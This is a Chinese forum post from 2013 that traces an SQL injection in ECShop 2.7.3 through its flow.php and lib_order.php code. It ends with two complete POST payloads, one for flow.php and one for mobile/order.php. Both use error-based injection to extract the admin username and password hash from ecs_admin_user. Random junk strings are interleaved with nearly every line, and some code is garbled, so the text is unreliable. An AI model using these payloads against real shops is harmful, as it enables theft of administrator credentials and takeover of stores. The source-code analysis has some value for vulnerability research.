前段时间大概2012年圣诞节左右,在t00ls上看见ecshop全版本注入,当时也下载了最新的程序分析了下,最近考试比较忙,今天刚考完,把我分析的记录下来。
3 A/ L/ Q5 e/ h3 N6 U- \2 _$ u7 j; ?. a4 A
漏洞关键文件:
% s# f7 V# ~. m9 i, U% x( w# Z, h- {, h. G# x
/includes/lib_order.php9 J/ n0 d) f( f+ k3 z
% B7 {3 q7 ] X 关键函数:
6 U" N) }4 U, j* | X5 a
7 e* I/ P2 l. x! a1 e% y ; U: X" @0 z0 ]% K I! Z. u* W. |
4 b# ~7 ~0 ^; T7 z/ t5 D: l
01 function available_shipping_list($region_id_list)
' I& M6 J0 p/ T( ]; H( Y
6 O. |, L# h* h6 S$ q/ Z02 { 3 x, p5 I4 V8 u% f+ O
9 |6 m* d0 S C- V& V
03 $sql = 'SELECT s.shipping_id, s.shipping_code, s.shipping_name, ' .
1 ~3 P F' b8 g4 t! H/ ]( g7 |" E) \2 H' L* @
04 's.shipping_desc, s.insure, s.support_cod, a.configure ' . 5 u a! w8 ?3 B. h; V# q4 J
2 ?: ]! ~, q/ _) \0 |* G$ \05 'FROM ' . $GLOBALS['ecs']->table('shipping') . ' AS s, ' .
+ x, }8 O' J7 J) v: b9 o$ s. U% F# `0 ^7 {% Z W; {! v: }7 l
06 $GLOBALS['ecs']->table('shipping_area') . ' AS a, ' . ) A. X5 v2 z9 t7 w B& P4 w A3 z% \
, Z4 v: ?1 Z* g' \
07 $GLOBALS['ecs']->table('area_region') . ' AS r '. % j8 g2 ]! G( [+ T$ r: h! g( d& M8 v
/ b. Y# R. T; P: K) b- L9 k8 A4 Y* w! y08 'WHERE r.region_id ' . db_create_in($region_id_list) . 6 j/ [1 m8 [, I+ M7 _. }: A
" P' ~9 D9 v: d( \09 ' AND r.shipping_area_id = a.shipping_area_id AND a.shipping_id = s.shipping_id AND s.enabled = 1 ORDER BY s.shipping_order';
# L5 {% U! H4 r$ E& X5 Y" R
* |+ u+ a& e. H! R# N- _3 b5 N10 % }# c5 S0 v1 I) i" A7 U: W' G* S
% z& v0 J* e/ w8 ~11 return $GLOBALS['db']->getAll($sql);
& W, E2 y0 ]$ C& K: H1 ?1 N0 @- F ^
. f( @- k$ E3 I* {$ C, R% ]9 F# s12 } / [+ i7 l3 J% J% |4 |' C) I
! |9 S5 t- D3 Z s
显然对传入的参数没有任何过滤就带入了查询语句。: P! e+ z: y; K7 Z
( F: W) D$ N' |$ m
下面我们追踪这个函数在flow.php中:8 C0 E4 l1 p: Z( _. W& V b# V
第531行:
+ W( A( ^6 W8 }1 v9 ^
- i) ]2 `% P! J3 C3 H" y1 $shipping_list = available_shipping_list($region);
# h) H" e% J7 W U. @( @# h# Q% ~; Z$ h" h
, ?7 w- i2 |6 G/ C7 u% L! N
, V# h" j2 y9 c- k) q ) {7 i6 w0 ?6 l: N: m
) q9 x% Y8 h# k5 v" M( U
再对传入变量进行追踪:
5 {2 R5 g9 p: Q/ D
0 w5 h& M( O; l! {) z7 Y第530行: 8 f% Y9 T; ^ H* J
" D$ K, j8 n. m3 L1 $region = array($consignee['country'], $consignee['province'],$consignee['city'], $consignee['district']);
/ c8 i u8 E( V. H3 p9 x7 L( o8 u% A ]# j7 `
5 U$ C4 _! Q5 E& m! x
6 i9 D p# x6 s , T& F0 K4 f9 F7 b* ^, H$ |
- R6 A$ g* [6 {1 [
第473行: 6 S- U% X) A" U- Y
/ N: g' [7 o) u3 ~ t
1 $consignee = get_consignee($_SESSION['user_id']);
4 N. x3 Q2 t; Q4 a+ \" W# |& y6 S7 h0 ~1 C1 s* \ K
到了一个关键函数:, w1 Y8 h& d/ `4 K
& e! U: {2 Z9 m9 J/includes/lib_order.php
! O. ]& y% H. u" f8 Z' \5 [+ D! k& b! A' \2 l# q e! S9 _$ x
+ j: \, q9 p& G1 I4 |
+ S# ^) R0 A& k " v+ D* L- x L+ R! {' m
( W5 T( ]) y+ m; t/ Q- S01 function get_consignee($user_id) 3 u' H) b9 u1 b5 s3 z
. z* C# v! r5 _/ H0 ^" o! F, [, o3 A02 { 5 @9 B1 N6 ~- a9 j# s# L. B- t+ `
+ x! p5 g3 W! x
03 if (isset($_SESSION['flow_consignee']))
2 b5 r0 y0 u/ p" w7 o. ?
7 |; k+ j T- X5 i8 | z" K# p04 { 3 B2 _. L1 R% R4 e$ c: J8 y9 U% k
4 y2 C/ U" ?$ W; Y$ B/ i- K" q; `
05 /* 如果存在session,则直接返回session中的收货人信息 */ 2 B4 w3 L$ H0 l
) S$ y5 N7 }2 d0 W
06 4 Z! F, O8 g. q2 S- I& d% q
# T* Y- M: A4 m4 @9 m5 J4 D07 return $_SESSION['flow_consignee']; 8 v2 g( H) p! @, @& W
; ^' p8 b5 T1 b0 g08 } % S% k. ^$ P- u O2 J) K! h
5 J+ _4 F4 d) ^5 h! T4 c% Z
09 else 9 o0 Z- Z) }) G: n* \2 `+ w7 P
5 ?) }; B( t* s' j4 K. @6 A
10 {
# G) v) x; v3 s y% u: Q5 {
5 ]9 V- L1 A3 e# Y2 Q11 /* 如果不存在,则取得用户的默认收货人信息 */
$ V h X+ l4 S! r6 D- t; V+ @. |4 R
* Z7 f P1 ~- C7 A12 $arr = array(); 1 b/ v1 B+ w2 H/ X9 T
B' `$ X; d+ P( y+ n13
}/ o+ [; y* L2 w$ \$ p1 U: |3 i/ [# a0 W" _6 y. g: ~
14 if ($user_id > 0) 7 B+ W$ D! Z+ x4 u5 J3 ^
8 A! H+ `& N0 ]! F9 B% i& J% ]15 { r5 b6 A6 Q; A9 ]
, I7 O4 B k8 G" h$ L5 N/ y16 /* 取默认地址 */
- L+ }- {$ v% l3 v, k& [
7 Y* A7 L u2 l3 N# z; d) \! `17 $sql = "SELECT ua.*". ) c# h+ z- R0 s; ]
! m6 L! i" }+ v% a1 S8 Z6 l) F" K' l18 " FROM " . $GLOBALS['ecs']->table('user_address') . "AS ua, ".$GLOBALS['ecs']->table('users').' AS u '.
7 b# n+ n' B5 ]+ Z
$ _6 t; {* Y# L9 R19 " WHERE u.user_id='$user_id' AND ua.address_id = u.address_id"; 5 v, n; v, _. l' \8 k6 B$ {; x$ N
$ h* e# I' F/ v. ~
20 $ F4 T: ]. ]8 N( L
4 l( |8 |3 N) Y
21 $arr = $GLOBALS['db']->getRow($sql);
( i8 r2 o9 j& A3 I, x1 L0 I+ ?" {6 F8 @
22 }
* }# M* J) B+ f0 o6 M% b9 P' P9 @
9 M' \* H6 a3 S8 Y; A23
) W7 k7 f* d3 m% G+ ^% \% x% z+ N5 f; ^" o0 W; a& |6 a# \8 q
24 return $arr;
' U1 [ m, a9 |6 V
3 T3 w( n% s6 k% V+ z0 w25 } % L) `9 q% o4 g( j' S
# Y- A8 Z. V. _0 y7 |
26 } $ ~7 J4 W$ Q1 p& U: [% P
" d" V/ q6 x% d2 [
显然如果 isset($_SESSION['flow_consignee']存在就直接使用。到底存不存在呢?; I- V7 {3 `& ~/ c8 f/ h) p
/ y. x( |" R; t; R! j
! G$ `" f6 Y' L% Q1 u" e1 T- F1 E
: x8 U' L. X5 ^; D关键点:+ \* h/ q/ g! d9 C8 R. H( x
5 J" d& A* a+ n0 Y第400行: $_SESSION['flow_consignee'] = stripslashes_deep($consignee);; _2 Q, F7 R4 D
( C9 Y4 a8 X7 |- f
这里对传入参数反转义存入$_SESSION中。
4 Z4 Q; m1 }8 z1 `& m) k/ @4 S) R& W1 b) h
. A& c0 I8 ?" D# y4 y. ^. j5 }) v2 ^ n
" |+ T7 m+ \/ y; T, Z然后看下:
* w \/ k) K" d. ?8 K" Y* P5 f5 q$ t) B8 n! e- S
" ?( H J7 |- e( L4 y
$ i3 R, a, ~% u' e
) ?8 o3 g* A- P3 D' @# @, o' M2 N. f' K
01 $consignee = array(
# u. B8 j% _7 p4 |, t4 C+ o0 c
7 B& s% Q4 s. {8 B/ A8 u$ K: {( q02 'address_id' => empty($_POST['address_id']) ? 0 :intval($_POST['address_id']), & U( J$ s2 A0 g+ K1 H$ P0 C
7 w) U- F6 _) e$ D4 O03 'consignee' => empty($_POST['consignee']) ? '' : trim($_POST['consignee']),
" q% b, K& X' G+ u$ o7 v1 u. o
7 \5 y1 h% b2 x4 _% _04 'country' => empty($_POST['country']) ? ''  _POST['country'], . [3 T q$ s4 ~ S6 X! x! x8 @
4 j$ c5 }$ {8 D, q
05 'province' => empty($_POST['province']) ? '' _POST['province'], & G% t. j) E% Y3 [/ D
' H+ a* u; _! X l
06 'city' => empty($_POST['city']) ? '' _POST['city'],
! P' K* P* v% [" @ u3 p# E2 I
07 'district' => empty($_POST['district']) ? '' _POST['district'],
/ |! n* P+ j9 X% E w: C: q8 H: F2 L% E, c1 g. B# w) s3 r; b0 H
08 'email' => empty($_POST['email']) ? '' _POST['email'],
. Y+ {1 h1 O; J' C7 ]* D% _5 C- e' u& ?( s3 b1 l
09 'address' => empty($_POST['address']) ? '' _POST['address'], / ], m- X5 t# Y+ i+ k& T) z6 u
" v6 ?+ \) c2 X+ c; B, n
10 'zipcode' => empty($_POST['zipcode']) ? '' : make_semiangle(trim($_POST['zipcode'])),
8 @1 N$ ~& T. q8 \' S T6 }
0 z+ Z b, E$ @: s2 y+ N11 'tel' => empty($_POST['tel']) ? '' : make_semiangle(trim($_POST['tel'])), / u( ]% S+ L3 p0 v: L
* T$ l( s- p6 @' d% ^1 d
12 'mobile' => empty($_POST['mobile']) ? '' : make_semiangle(trim($_POST['mobile'])), 7 N, m# O) c; U8 u$ `% b; B9 k
; h( O. o& s& X# u13 'sign_building' => empty($_POST['sign_building']) ? '' _POST['sign_building'], + X* g/ U0 }/ U7 F
5 l1 n, d, ]+ D% x8 g. |3 @14 'best_time' => empty($_POST['best_time']) ? '' _POST['best_time'], * v1 T9 ?, t) a+ |/ b: r
1 \3 w& y; `' M" F% u0 T8 S+ d% _
15 ); + O7 J9 i7 x4 S4 N8 Z; e4 o
" p8 e) s* E) X+ ~; w% q
好了注入就这样出现了。
0 k' a6 h6 c Z8 Q: r* u. M m0 d& h( P% w
==================
6 |7 ~- L0 |4 \' `: d: R
; n/ |" }9 f. i5 P! D' z注入测试:
$ R# W% S& D/ D9 w% g5 ~2 z8 P
. c! J& X S1 t! D环境:windows7+xampp1.7.7(Apache2.2.21+Php 5.3.8+Mysql 5.5.16): [2 D: n' k8 E+ _
! ?( Q& |: q! Q+ u# _4 r+ ]测试程序:ECShop_V2.7.3_UTF8_release1106& Y0 [3 c1 R1 p# ^7 I5 Y5 C$ @8 e
% B1 j3 Z0 a2 f! P# }# B* K
6 W( y2 E4 R# [1 R9 d+ G
3 _: _0 f( |: q# K4 E1.首先需要点击一个商品加入购物车
; K0 R. n$ W! Y' L
7 h$ Q- [8 x# {+ A( G2.注册一个会员帐号5 I: [/ M& B0 u! s
5 [8 Q3 N5 M# B3.post提交数据
9 {8 Y7 V" N9 I, L/ E% \* D# x4 b3 t7 s6 j# j7 {
% [. h3 M0 y+ `. l! ? z
% }- N7 j# d2 k+ j" N1 http://127.0.0.1/ecshop/flow.php ! F. Z4 s2 \# e' @3 q% H( e7 E& v
- V% {9 U0 P D! o# _2
5 Z+ e* j3 y2 Y6 h( M. Y0 }; I' ?# P9 s' w0 M1 I
3 country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=
( @/ n) k+ o q举一反三,我们根据这个漏洞我们可以继续深入挖掘:
: O, A- [ n# [8 A0 l. ~ |; l7 k. j) }
我们搜寻关键函数function available_shipping_list()
0 H2 z$ M9 m- }" T$ Q: ?
$ b9 e' ~5 m3 d! I# e. I) E在文件/moblie/order.php中出现有,次文件为手机浏览文件功能基本和flow.php相同,代码流程基本相同
( E8 V; f% X# Z$ P) T* }
. X0 U( X) O5 p0 u! P+ z5 J利用exp:6 x) T/ ~" J+ L3 Z5 |3 r
1 k2 I$ G2 f- F- {1 i5 O0 {
1.点击一个商品,点击购买商标8 h2 ?) K p. a# B0 L- E- Q
7 s4 F' ~' A. t, Y
2.登录会员帐号 P( u( W0 y* o5 e
9 W- O$ S2 Q2 g) K3 R r& m* ~3.post提交:0 W& f& _9 T% s
" L" V$ }3 s. |, P; l' Dhttp://127.0.0.1/ecshop/mobile/order.php6 o! `4 p, w& c" ^! @5 l
- S, g l# q7 h) h; N+ k+ p
+ r+ \5 @$ \% o- ^4 }
f( a$ f! S# ]# s1 |country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&&act=order_lise&address_id=8 i0 `; `9 ^1 T ]3 f$ A/ L
0 {5 w' u9 [! L' l# Z8 ~! N |
发表于 2013-1-13 09:48:03
收藏
支持
反对